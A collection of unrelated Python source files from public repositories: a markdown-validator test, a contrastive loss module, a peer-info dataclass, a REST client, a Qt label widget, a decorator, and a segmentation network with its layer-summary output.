MARKDOWN_WITHOUT_DESCRIPTION)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*has to contain a short description.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_missing_metadata(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITH_MISSING_METADATA)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*missing.*fine-tunable.*module-type.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_duplicate_metadata(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITH_DUPLICATE_METADATA)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*duplicate.*asset-path.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_unexpected_lines(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITH_UNEXPECTED_LINES)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*Unexpected line.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_parsed_full(self):
documentation_parser = validator.DocumentationParser("root")
documentation_parser.validate(
file_path="root/google/models/text-embedding-model/1.md",
documentation_content=self.minimal_markdown,
do_smoke_test=True)
self.assertEqual("Simple description spanning multiple lines.",
documentation_parser.parsed_description)
expected_metadata = {
"asset-path": {self.model_path},
"module-type": {"text-embedding"},
"fine-tunable": {"true"},
"format": {"saved_model_2"},
}
self.assertAllEqual(expected_metadata, documentation_parser.parsed_metadata)
def test_bad_model_does_not_pass_smoke_test(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
self.minimal_markdown_with_bad_model)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*failed to parse.*"):
validator.validate_documentation_files(
documentation_dir="root",
files_to_validate=["google/models/text-embedding-model/1.md"],
filesystem=filesystem)
def test_markdown_with_allowed_license(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/model/1.md",
MINIMAL_MARKDOWN_WITH_ALLOWED_LICENSE)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_unknown_license(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/model/1.md",
MINIMAL_MARKDOWN_WITH_UNKNOWN_LICENSE)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*specify a license id from list.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
if __name__ == "__main__":
tf.compat.v1.enable_v2_behavior()
tf.test.main()
avg_line_length: 36.933535 | max_line_length: 80 | alphanum_fraction: 0.695051

hexsha: 1adf83d4ac3d58a455126167c9630c8a1f95e402 | size: 2400 | ext: py | lang: Python
max_stars_repo: path=models/patchnce.py | name=bronemos/contrastive-unpaired-translation-focal | head_hexsha=50b9008d08a86439ede081a910d02df5da8e32df | licenses=["BSD-3-Clause"] | count=null | stars_event=null..null
max_issues_repo: path=models/patchnce.py | name=bronemos/contrastive-unpaired-translation-focal | head_hexsha=50b9008d08a86439ede081a910d02df5da8e32df | licenses=["BSD-3-Clause"] | count=null | issues_event=null..null
max_forks_repo: path=models/patchnce.py | name=bronemos/contrastive-unpaired-translation-focal | head_hexsha=50b9008d08a86439ede081a910d02df5da8e32df | licenses=["BSD-3-Clause"] | count=null | forks_event=null..null
from packaging import version
import torch
from torch import nn
from .focal_loss import FocalLoss
class PatchNCELoss(nn.Module):
def __init__(self, opt):
super().__init__()
self.opt = opt
self.cross_entropy_loss = torch.nn.CrossEntropyLoss(reduction="none")
self.focal_loss = FocalLoss()
self.mask_dtype = (
torch.uint8
if version.parse(torch.__version__) < version.parse("1.2.0")
else torch.bool
)
def forward(self, feat_q, feat_k):
batchSize = feat_q.shape[0]
dim = feat_q.shape[1]
feat_k = feat_k.detach()
# pos logit
l_pos = torch.bmm(feat_q.view(batchSize, 1, -1), feat_k.view(batchSize, -1, 1))
l_pos = l_pos.view(batchSize, 1)
# neg logit
# Should the negatives from the other samples of a minibatch be utilized?
# In CUT and FastCUT, we found that it's best to only include negatives
# from the same image. Therefore, we set
# --nce_includes_all_negatives_from_minibatch as False
# However, for single-image translation, the minibatch consists of
# crops from the "same" high-resolution image.
# Therefore, we will include the negatives from the entire minibatch.
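        # Example (assumed numbers, not from the config): with opt.batch_size = 2 images
        # and 256 sampled patches per image, feat_q arrives here as (512, dim).
        # batch_dim_for_bmm = 2 reshapes it to (2, 256, dim), so l_neg below is computed
        # per image (256 x 256 similarities); batch_dim_for_bmm = 1 gives (1, 512, dim)
        # and negatives are drawn from the whole minibatch.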
if self.opt.nce_includes_all_negatives_from_minibatch:
# reshape features as if they are all negatives of minibatch of size 1.
batch_dim_for_bmm = 1
else:
batch_dim_for_bmm = self.opt.batch_size
# reshape features to batch size
feat_q = feat_q.view(batch_dim_for_bmm, -1, dim)
feat_k = feat_k.view(batch_dim_for_bmm, -1, dim)
npatches = feat_q.size(1)
l_neg_curbatch = torch.bmm(feat_q, feat_k.transpose(2, 1))
        # Diagonal entries are similarities of each patch with itself and hence meaningless
        # as negatives; fill them with -10.0 so that, after dividing by nce_T and applying
        # the softmax inside the loss, their contribution (~exp(-10 / nce_T)) is essentially zero.
diagonal = torch.eye(npatches, device=feat_q.device, dtype=self.mask_dtype)[
None, :, :
]
l_neg_curbatch.masked_fill_(diagonal, -10.0)
l_neg = l_neg_curbatch.view(-1, npatches)
out = torch.cat((l_pos, l_neg), dim=1) / self.opt.nce_T
loss = self.focal_loss(
out, torch.zeros(out.size(0), dtype=torch.long, device=feat_q.device)
)
return loss
avg_line_length: 36.363636 | max_line_length: 90 | alphanum_fraction: 0.637917

hexsha: c3d53838dee8952fb86cf031499d958cbd07cfb5 | size: 1918 | ext: py | lang: Python
max_stars_repo: path=chinilla/types/peer_info.py | name=Chinilla/chinilla-blockchain | head_hexsha=59bebcf94e65b74fbb53ad4929bbd79cb28be619 | licenses=["Apache-2.0"] | count=null | stars_event=null..null
max_issues_repo: path=chinilla/types/peer_info.py | name=Chinilla/chinilla-blockchain | head_hexsha=59bebcf94e65b74fbb53ad4929bbd79cb28be619 | licenses=["Apache-2.0"] | count=null | issues_event=null..null
max_forks_repo: path=chinilla/types/peer_info.py | name=Chinilla/chinilla-blockchain | head_hexsha=59bebcf94e65b74fbb53ad4929bbd79cb28be619 | licenses=["Apache-2.0"] | count=null | forks_event=null..null
import ipaddress
from dataclasses import dataclass
from typing import Optional, Union
from chinilla.util.ints import uint16, uint64
from chinilla.util.streamable import Streamable, streamable
@streamable
@dataclass(frozen=True)
class PeerInfo(Streamable):
host: str
port: uint16
def is_valid(self, allow_private_subnets=False) -> bool:
ip: Optional[Union[ipaddress.IPv6Address, ipaddress.IPv4Address]] = None
try:
ip = ipaddress.IPv6Address(self.host)
except ValueError:
ip = None
if ip is not None:
if ip.is_private and not allow_private_subnets:
return False
return True
try:
ip = ipaddress.IPv4Address(self.host)
except ValueError:
ip = None
if ip is not None:
if ip.is_private and not allow_private_subnets:
return False
return True
return False
# Functions related to peer bucketing in new/tried tables.
def get_key(self):
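        # IPv4 hosts are embedded into the 6to4 IPv6 range (2002::/16, with the v4
        # address in bits 80-111), so every peer yields a 16-byte address key; the two
        # port bytes are then appended in big-endian order.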
try:
ip = ipaddress.IPv6Address(self.host)
except ValueError:
ip_v4 = ipaddress.IPv4Address(self.host)
ip = ipaddress.IPv6Address(int(ipaddress.IPv6Address("2002::")) | (int(ip_v4) << 80))
key = ip.packed
key += bytes([self.port // 0x100, self.port & 0x0FF])
return key
def get_group(self):
# TODO: Port everything from Bitcoin.
ipv4 = 1
try:
ip = ipaddress.IPv4Address(self.host)
except ValueError:
ip = ipaddress.IPv6Address(self.host)
ipv4 = 0
if ipv4:
group = bytes([1]) + ip.packed[:2]
else:
group = bytes([0]) + ip.packed[:4]
return group
@streamable
@dataclass(frozen=True)
class TimestampedPeerInfo(Streamable):
host: str
port: uint16
timestamp: uint64
avg_line_length: 28.205882 | max_line_length: 97 | alphanum_fraction: 0.601668

hexsha: c3e005bb70b3a30b736192894faf8abfa0cc1c7f | size: 3205 | ext: py | lang: Python
max_stars_repo: path=StockAnalysisSystem/interface/interface_rest.py | name=SleepySoft/StockAnalysisSystem | head_hexsha=75f95738831614f7946f85d09118e447f7ac6dc7 | licenses=["Apache-2.0"] | count=138 | stars_event=2018-01-03T03:32:49.000Z..2022-03-12T02:57:46.000Z
max_issues_repo: path=StockAnalysisSystem/interface/interface_rest.py | name=SleepySoft/StockAnalysisSystem | head_hexsha=75f95738831614f7946f85d09118e447f7ac6dc7 | licenses=["Apache-2.0"] | count=9 | issues_event=2018-01-01T03:16:24.000Z..2021-05-27T09:57:24.000Z
max_forks_repo: path=StockAnalysisSystem/interface/interface_rest.py | name=SleepySoft/StockAnalysisSystem | head_hexsha=75f95738831614f7946f85d09118e447f7ac6dc7 | licenses=["Apache-2.0"] | count=50 | forks_event=2019-08-05T01:02:30.000Z..2022-03-07T00:52:14.000Z
import requests
import datetime
import traceback
import pandas as pd
from functools import partial
from StockAnalysisSystem.core.Utility.JsonSerializer import serialize, deserialize
import StockAnalysisSystem.core.Utility.JsonSerializerImpl
# --------------------------------------------------------------------------------------
# Just port THIS FILE together with JsonSerializerImpl.py and JsonSerializer.py into your project.
# You can then access StockAnalysisSystem (sas) data through the REST interface
# without porting the whole sas project into your code base.
# --------------------------------------------------------------------------------------
class RestInterface:
def __init__(self):
self.__token = None
        self.__timeout = 9999  # Effectively blocking requests, for debugging
self.__api_url = 'http://127.0.0.1:80/api'
def if_init(self, api_uri: str = None, token: str = None, timeout=None) -> bool:
if token is not None:
self.__token = token
if timeout is not None:
self.__timeout = timeout
if api_uri is not None:
self.__api_url = api_uri
return True
def if_prob(self) -> dict:
return {
'name': 'Rest Interface',
'version': '1.0.0',
}
# ------------------------------------------------------------------------------------
def __getattr__(self, attr):
return partial(self.rest_interface_proxy, attr)
def rest_interface_proxy(self, api: str, *args, **kwargs) -> any:
"""
Cooperate with WebApiInterface.rest_interface_stub
:param api: The function name of interface that you want to call
:param args: The list args (which will be ignored in server side)
:param kwargs: The key-value args
:return: The response of server
"""
payload = {
'api': api,
'token': self.__token,
'args': serialize(args),
'kwargs': serialize(kwargs),
}
headers = {
}
try:
resp = requests.post(self.__api_url, json=payload, headers=headers, timeout=self.__timeout)
return self.deserialize_response(resp.text) if (resp.text is not None and resp.text != '') else None
except Exception as e:
print('Parse result fail: ' + str(e))
print(traceback.format_exc())
finally:
pass
@staticmethod
def deserialize_response(resp_text: str) -> any:
result = deserialize(resp_text)
return result
# ----------------------------------------------------------------------------------------------------------------------
def main():
caller = RestInterface()
caller.if_init(api_uri='http://127.0.0.1:80/api', token='xxxxxx')
df = caller.sas_query('Market.SecuritiesInfo', '000001.SZSE')
print(df)
df = caller.sas_query('Finance.IncomeStatement', '000001.SZSE', ('2000-01-01', '2020-12-31'), readable=True)
print(df)
if __name__ == '__main__':
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
avg_line_length: 32.373737 | max_line_length: 120 | alphanum_fraction: 0.541966

hexsha: 916edc55c2630f6dbc930027460c0392b3c1f30f | size: 2219 | ext: py | lang: Python
max_stars_repo: path=prettyqt/custom_widgets/elidedlabel.py | name=phil65/PrettyQt | head_hexsha=26327670c46caa039c9bd15cb17a35ef5ad72e6c | licenses=["MIT"] | count=7 | stars_event=2019-05-01T01:34:36.000Z..2022-03-08T02:24:14.000Z
max_issues_repo: path=prettyqt/custom_widgets/elidedlabel.py | name=phil65/PrettyQt | head_hexsha=26327670c46caa039c9bd15cb17a35ef5ad72e6c | licenses=["MIT"] | count=141 | issues_event=2019-04-16T11:22:01.000Z..2021-04-14T15:12:36.000Z
max_forks_repo: path=prettyqt/custom_widgets/elidedlabel.py | name=phil65/PrettyQt | head_hexsha=26327670c46caa039c9bd15cb17a35ef5ad72e6c | licenses=["MIT"] | count=5 | forks_event=2019-04-17T11:48:19.000Z..2021-11-21T10:30:19.000Z
from __future__ import annotations
from prettyqt import core, gui, widgets
from prettyqt.qt import QtWidgets
class ElidedLabel(widgets.Frame):
elision_changed = core.Signal(bool)
def __init__(
self,
text: str = "",
parent: QtWidgets.QWidget | None = None,
):
super().__init__(parent=parent)
self.elided = False
self.content = text
self.set_size_policy("expanding", "preferred")
def __repr__(self):
return f"{type(self).__name__}({self.text()!r})"
def set_text(self, text: str):
self.content = text
self.update()
def paintEvent(self, event):
super().paintEvent(event)
painter = gui.Painter(self)
metrics = painter.get_font_metrics()
did_elide = False
line_spacing = metrics.lineSpacing()
y = 0
layout = gui.TextLayout(self.content, painter.font())
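        # Lay the text out line by line: a line is drawn normally only while another
        # line would still fit below it; otherwise the rest of the string is elided
        # onto the current line and layout stops.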
with layout.process_layout():
while True:
line = layout.createLine()
if not line.isValid():
break
line.setLineWidth(self.width())
next_line_y = y + line_spacing
if self.height() >= next_line_y + line_spacing:
line.draw(painter, core.Point(0, y))
y = next_line_y
else:
last_line = self.content[line.textStart() :]
elided_line = metrics.elided_text(last_line, "right", self.width())
painter.drawText(0, y + metrics.ascent(), elided_line)
line = layout.createLine()
did_elide = line.isValid()
break
if did_elide != self.elided:
self.elided = did_elide
self.elision_changed.emit(did_elide)
# def paintEvent(self, event):
# painter = gui.Painter(self)
# metrics = gui.FontMetrics(self.font())
# elided = metrics.elided_text(self.text(), "right", self.width())
# painter.drawText(self.rect(), self.alignment(), elided)
if __name__ == "__main__":
app = widgets.app()
widget = ElidedLabel("test")
widget.show()
app.main_loop()
avg_line_length: 31.253521 | max_line_length: 87 | alphanum_fraction: 0.560613

hexsha: babef387c83b5edd6d41a2fbc4731b10d41016d5 | size: 333 | ext: py | lang: Python
max_stars_repo: path=src/interface_py/h2o4gpu/solvers/daal_solver/utils/helper_module.py | name=pnijhara/h2o4gpu | head_hexsha=6257112c134136471420b68241f57190a445b67d | licenses=["Apache-2.0"] | count=458 | stars_event=2017-09-20T08:32:10.000Z..2022-02-28T18:40:57.000Z
max_issues_repo: path=src/interface_py/h2o4gpu/solvers/daal_solver/utils/helper_module.py | name=Jun-NIBS/h2o4gpu | head_hexsha=9885416deb3285f5d0f33023d6c07373ac4fc0b7 | licenses=["Apache-2.0"] | count=461 | issues_event=2017-09-20T11:39:04.000Z..2021-11-21T15:51:42.000Z
max_forks_repo: path=src/interface_py/h2o4gpu/solvers/daal_solver/utils/helper_module.py | name=Jun-NIBS/h2o4gpu | head_hexsha=9885416deb3285f5d0f33023d6c07373ac4fc0b7 | licenses=["Apache-2.0"] | count=114 | forks_event=2017-09-20T12:08:07.000Z..2021-11-29T14:15:40.000Z
# -*- encoding: utf-8 -*-
"""
:copyright: 2017-2018 H2O.ai, Inc.
:license: Apache License Version 2.0 (see LICENSE for details)
"""
from functools import wraps
def print_name(func):
@wraps(func)
def full(*args, **kwargs):
print("**-> {}".format(func.__name__))
return func(*args, **kwargs)
return full
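# Example usage (hypothetical function name):
#
#   @print_name
#   def fit_model():
#       ...
#
#   fit_model()   # prints "**-> fit_model" before running the body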
avg_line_length: 23.785714 | max_line_length: 64 | alphanum_fraction: 0.618619

hexsha: 24ce653bbe6a608abfa4cf571516b19725b550ec | size: 40747 | ext: py | lang: Python
max_stars_repo: path=model/DFSegX11.py | name=Ethan-ye/Efficient-Segmentation-Networks | head_hexsha=27272e43126a507a6d93b21cd2372f5432f61237 | licenses=["MIT"] | count=null | stars_event=null..null
max_issues_repo: path=model/DFSegX11.py | name=Ethan-ye/Efficient-Segmentation-Networks | head_hexsha=27272e43126a507a6d93b21cd2372f5432f61237 | licenses=["MIT"] | count=null | issues_event=null..null
max_forks_repo: path=model/DFSegX11.py | name=Ethan-ye/Efficient-Segmentation-Networks | head_hexsha=27272e43126a507a6d93b21cd2372f5432f61237 | licenses=["MIT"] | count=null | forks_event=null..null
# -*- coding: utf-8 -*-
###########################################################################
# Partial order pruning: for best speed/accuracy trade-off in neural architecture search
# https://github.com/lixincn2015/Partial-Order-Pruning
###########################################################################
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
from torchsummary import summary
from utils.activations import NON_LINEARITY
from fvcore.nn.flop_count import flop_count # https://github.com/facebookresearch/fvcore
from tools.flops_counter.ptflops import get_model_complexity_info
from thop import profile # https://github.com/Lyken17/pytorch-OpCounter
__all__ = ['DF1SegX11']
# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py
def get_upsampling_weight(in_channels, out_channels, kernel_size):
"""Make a 2D bilinear kernel suitable for upsampling"""
factor = (kernel_size + 1) // 2
if kernel_size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:kernel_size, :kernel_size]
filt = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
dtype=np.float64)
weight[range(in_channels), range(out_channels), :, :] = filt
return torch.from_numpy(weight).float()
class ResBlock(nn.Module):
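    # Residual block used by DF1SegX11: with stride=2 the main path runs
    # conv00 (3x3, stride 1) -> conv01 (3x3, stride 2) -> conv2 (3x3); with stride=1
    # it runs conv1 (3x3) -> conv2 (3x3). `downsample` projects the identity branch
    # when the shape changes.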
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(ResBlock, self).__init__()
self.conv00 = nn.Conv2d(inplanes, inplanes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn00 = nn.BatchNorm2d(inplanes)
self.conv01 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=2, padding=1, bias=False)
self.bn01 = nn.BatchNorm2d(planes)
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
if self.stride == 2:
out = self.conv00(x)
out = self.bn00(out)
out = self.relu(out)
out = self.conv01(out)
out = self.bn01(out)
out = self.relu(out)
else:
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
else:
residual = x
out += residual
out = self.relu(out)
return out
# self.decoder4 = nn.Sequential(
# nn.Conv2d(128, 32, kernel_size=1, bias=False),
# nn.BatchNorm2d(32),
# nn.ReLU(inplace=True),
# nn.ConvTranspose2d(32, 32, 4, stride=2, padding=1, groups=32, bias=False) # lr=0, bilinear
# )
class FuseBlock(nn.Module):
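    # Decoder fusion block: a 1x1 conv reduces the deeper feature map to `planes`
    # channels, a depthwise ConvTranspose2d upsamples it 2x (initialized to bilinear
    # weights in DF1SegX11._initialize_weights), then the result is concatenated with
    # the shallower map and fused by a 3x3 conv.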
def __init__(self, inplanes, planes):
super(FuseBlock, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.dconv = nn.ConvTranspose2d(planes, planes, kernel_size=4, stride=2, padding=1, groups=planes,
bias=False) # lr=0, bilinear
self.conv2 = nn.Conv2d(planes * 2, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
# self.stride = stride
def forward(self, deep, shallow):
deep = self.conv1(deep)
deep = self.bn1(deep)
deep = self.relu(deep)
# with torch.no_grad():
deep = self.dconv(deep)
fuse = torch.cat([deep, shallow], 1)
fuse = self.conv2(fuse)
fuse = self.bn2(fuse)
fuse = self.relu(fuse)
return fuse
# https://github.com/Lextal/pspnet-pytorch/blob/master/pspnet.py
class PSPModule(nn.Module):
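    # Pyramid pooling: adaptively average-pool the input to each grid size in `sizes`,
    # reduce each pooled map to features//len(sizes) channels with a 1x1 conv, upsample
    # everything back to the input resolution, concatenate with the input and fuse with
    # a 3x3 conv (DF1SegX11 passes sizes=(1, 2, 4, 8)).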
def __init__(self, features=512, out_features=512, sizes=(1, 2, 3, 6)):
super(PSPModule, self).__init__()
n = len(sizes)
self.stages = []
self.stages = nn.ModuleList([self._make_stage(features, size, n) for size in sizes])
self.bottleneck = nn.Conv2d(features + features // n * n, out_features, kernel_size=3, padding=1, bias=False)
self.bn = nn.BatchNorm2d(out_features)
self.relu = nn.ReLU(inplace=True)
def _make_stage(self, features, size, n):
prior = nn.AdaptiveAvgPool2d(output_size=(size, size))
conv = nn.Conv2d(features, features // n, kernel_size=1, bias=False)
bn = nn.BatchNorm2d(features // n)
relu = nn.ReLU(inplace=True)
return nn.Sequential(prior, conv, bn, relu)
def forward(self, x):
h, w = x.size(2), x.size(3)
priors = [F.upsample(input=stage(x), size=(h, w), mode='bilinear') for stage in self.stages] + [x]
out = self.bottleneck(torch.cat(priors, 1))
out = self.bn(out)
return self.relu(out)
class DF1SegX11(nn.Module):
def __init__(self, classes=19):
super(DF1SegX11, self).__init__()
# encode
self.conv1 = nn.Sequential(
nn.Conv2d(3, 3, kernel_size=3, padding=1, stride=1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(inplace=True),
nn.Conv2d(3, 32, kernel_size=3, padding=1, stride=2, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True)
)
self.conv2 = nn.Sequential(
nn.Conv2d(32, 32, kernel_size=3, padding=1, stride=1, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, kernel_size=3, padding=1, stride=2, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True)
)
self.inplanes = 64
self.res2 = self._make_layer(64, 3, stride=2)
self.res3 = self._make_layer(128, 3, stride=2)
self.res4_1 = self._make_layer(256, 3, stride=2)
self.res4_2 = self._make_layer(512, 1, stride=1)
self.psp = PSPModule(512, 512, (1, 2, 4, 8))
self.wc3 = nn.Sequential(
nn.Conv2d(64, classes, kernel_size=1, bias=False),
nn.BatchNorm2d(classes),
nn.ReLU(inplace=True)
)
self.wc4 = nn.Sequential(
nn.Conv2d(128, 32, kernel_size=1, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True)
)
self.wc5 = nn.Sequential(
nn.Conv2d(512, 128, kernel_size=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
)
self.dec4 = FuseBlock(128, 32) # fuse wc5 wc4
self.dec3 = FuseBlock(32, classes) # fuse wc4 wc3
self.score = nn.Sequential(
nn.Conv2d(classes, classes, kernel_size=3, padding=1, stride=1, bias=False),
nn.BatchNorm2d(classes),
nn.ReLU(inplace=True)
)
self.score_u8 = nn.ConvTranspose2d(classes, classes, kernel_size=16, padding=4, stride=8, groups=classes,
bias=False)
self._initialize_weights()
# decode
# for m in self.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# elif isinstance(m, nn.BatchNorm2d):
# m.weight.data.fill_(1)
# m.bias.data.zero_()
def _make_layer(self, planes, blocks, stride=1):
if stride != 1 or self.inplanes != planes:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes,
kernel_size=stride, stride=stride, bias=False),
nn.BatchNorm2d(planes),
)
else:
downsample = None
layers = list()
layers.append(ResBlock(self.inplanes, planes, stride, downsample))
self.inplanes = planes
for i in range(1, blocks):
layers.append(ResBlock(self.inplanes, planes))
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
# if isinstance(m, nn.Conv2d):
# m.weight.data.zero_()
# if m.bias is not None:
# m.bias.data.zero_()
if isinstance(m, nn.ConvTranspose2d):
assert m.kernel_size[0] == m.kernel_size[1]
initial_weight = get_upsampling_weight(
m.in_channels, m.out_channels//m.groups, m.kernel_size[0])
m.weight.data.copy_(initial_weight)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x_res2 = self.res2(x)
x_res3 = self.res3(x_res2)
x = self.res4_1(x_res3)
x = self.res4_2(x)
x = self.psp(x)
x_wc3 = self.wc3(x_res2)
x_wc4 = self.wc4(x_res3)
x = self.wc5(x)
x = self.dec4(x, x_wc4)
x = self.dec3(x, x_wc3)
x = self.score(x)
# with torch.no_grad():
x = self.score_u8(x)
return x
if __name__ == "__main__":
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = DF1SegX11(classes=19).to(device)
summary(model, (3, 352, 480))
x = torch.randn(2, 3, 512, 1024).to(device)
from fvcore.nn.jit_handles import batchnorm_flop_jit
from fvcore.nn.jit_handles import generic_activation_jit
supported_ops = {
"aten::batch_norm": batchnorm_flop_jit,
}
flop_dict, _ = flop_count(model, (x,), supported_ops)
flops_count, params_count = get_model_complexity_info(model, (3, 512, 1024),
as_strings=False,
print_per_layer_stat=True)
input = x
macs, params = profile(model, inputs=(input,))
print(flop_dict)
print(flops_count, params_count)
print(macs, params)
'''
/home/ethan/anaconda3/envs/py36_cuda101/bin/python /home/ethan/codes/Efficient-Segmentation-Networks/model/DFSegX11.py
/home/ethan/anaconda3/envs/py36_cuda101/lib/python3.6/site-packages/torch/nn/functional.py:2941: UserWarning: nn.functional.upsample is deprecated. Use nn.functional.interpolate instead.
warnings.warn("nn.functional.upsample is deprecated. Use nn.functional.interpolate instead.")
/home/ethan/anaconda3/envs/py36_cuda101/lib/python3.6/site-packages/torch/nn/functional.py:3121: UserWarning: Default upsampling behavior when mode=bilinear is changed to align_corners=False since 0.4.0. Please specify align_corners=True if the old behavior is desired. See the documentation of nn.Upsample for details.
"See the documentation of nn.Upsample for details.".format(mode))
----------------------------------------------------------------
Layer (type) Output Shape Param #
================================================================
Conv2d-1 [-1, 3, 352, 480] 81
BatchNorm2d-2 [-1, 3, 352, 480] 6
ReLU-3 [-1, 3, 352, 480] 0
Conv2d-4 [-1, 32, 176, 240] 864
BatchNorm2d-5 [-1, 32, 176, 240] 64
ReLU-6 [-1, 32, 176, 240] 0
Conv2d-7 [-1, 32, 176, 240] 9,216
BatchNorm2d-8 [-1, 32, 176, 240] 64
ReLU-9 [-1, 32, 176, 240] 0
Conv2d-10 [-1, 64, 88, 120] 18,432
BatchNorm2d-11 [-1, 64, 88, 120] 128
ReLU-12 [-1, 64, 88, 120] 0
Conv2d-13 [-1, 64, 88, 120] 36,864
BatchNorm2d-14 [-1, 64, 88, 120] 128
ReLU-15 [-1, 64, 88, 120] 0
Conv2d-16 [-1, 64, 44, 60] 36,864
BatchNorm2d-17 [-1, 64, 44, 60] 128
ReLU-18 [-1, 64, 44, 60] 0
Conv2d-19 [-1, 64, 44, 60] 36,864
BatchNorm2d-20 [-1, 64, 44, 60] 128
Conv2d-21 [-1, 64, 44, 60] 16,384
BatchNorm2d-22 [-1, 64, 44, 60] 128
ReLU-23 [-1, 64, 44, 60] 0
ResBlock-24 [-1, 64, 44, 60] 0
Conv2d-25 [-1, 64, 44, 60] 36,864
BatchNorm2d-26 [-1, 64, 44, 60] 128
ReLU-27 [-1, 64, 44, 60] 0
Conv2d-28 [-1, 64, 44, 60] 36,864
BatchNorm2d-29 [-1, 64, 44, 60] 128
ReLU-30 [-1, 64, 44, 60] 0
ResBlock-31 [-1, 64, 44, 60] 0
Conv2d-32 [-1, 64, 44, 60] 36,864
BatchNorm2d-33 [-1, 64, 44, 60] 128
ReLU-34 [-1, 64, 44, 60] 0
Conv2d-35 [-1, 64, 44, 60] 36,864
BatchNorm2d-36 [-1, 64, 44, 60] 128
ReLU-37 [-1, 64, 44, 60] 0
ResBlock-38 [-1, 64, 44, 60] 0
Conv2d-39 [-1, 64, 44, 60] 36,864
BatchNorm2d-40 [-1, 64, 44, 60] 128
ReLU-41 [-1, 64, 44, 60] 0
Conv2d-42 [-1, 128, 22, 30] 73,728
BatchNorm2d-43 [-1, 128, 22, 30] 256
ReLU-44 [-1, 128, 22, 30] 0
Conv2d-45 [-1, 128, 22, 30] 147,456
BatchNorm2d-46 [-1, 128, 22, 30] 256
Conv2d-47 [-1, 128, 22, 30] 32,768
BatchNorm2d-48 [-1, 128, 22, 30] 256
ReLU-49 [-1, 128, 22, 30] 0
ResBlock-50 [-1, 128, 22, 30] 0
Conv2d-51 [-1, 128, 22, 30] 147,456
BatchNorm2d-52 [-1, 128, 22, 30] 256
ReLU-53 [-1, 128, 22, 30] 0
Conv2d-54 [-1, 128, 22, 30] 147,456
BatchNorm2d-55 [-1, 128, 22, 30] 256
ReLU-56 [-1, 128, 22, 30] 0
ResBlock-57 [-1, 128, 22, 30] 0
Conv2d-58 [-1, 128, 22, 30] 147,456
BatchNorm2d-59 [-1, 128, 22, 30] 256
ReLU-60 [-1, 128, 22, 30] 0
Conv2d-61 [-1, 128, 22, 30] 147,456
BatchNorm2d-62 [-1, 128, 22, 30] 256
ReLU-63 [-1, 128, 22, 30] 0
ResBlock-64 [-1, 128, 22, 30] 0
Conv2d-65 [-1, 128, 22, 30] 147,456
BatchNorm2d-66 [-1, 128, 22, 30] 256
ReLU-67 [-1, 128, 22, 30] 0
Conv2d-68 [-1, 256, 11, 15] 294,912
BatchNorm2d-69 [-1, 256, 11, 15] 512
ReLU-70 [-1, 256, 11, 15] 0
Conv2d-71 [-1, 256, 11, 15] 589,824
BatchNorm2d-72 [-1, 256, 11, 15] 512
Conv2d-73 [-1, 256, 11, 15] 131,072
BatchNorm2d-74 [-1, 256, 11, 15] 512
ReLU-75 [-1, 256, 11, 15] 0
ResBlock-76 [-1, 256, 11, 15] 0
Conv2d-77 [-1, 256, 11, 15] 589,824
BatchNorm2d-78 [-1, 256, 11, 15] 512
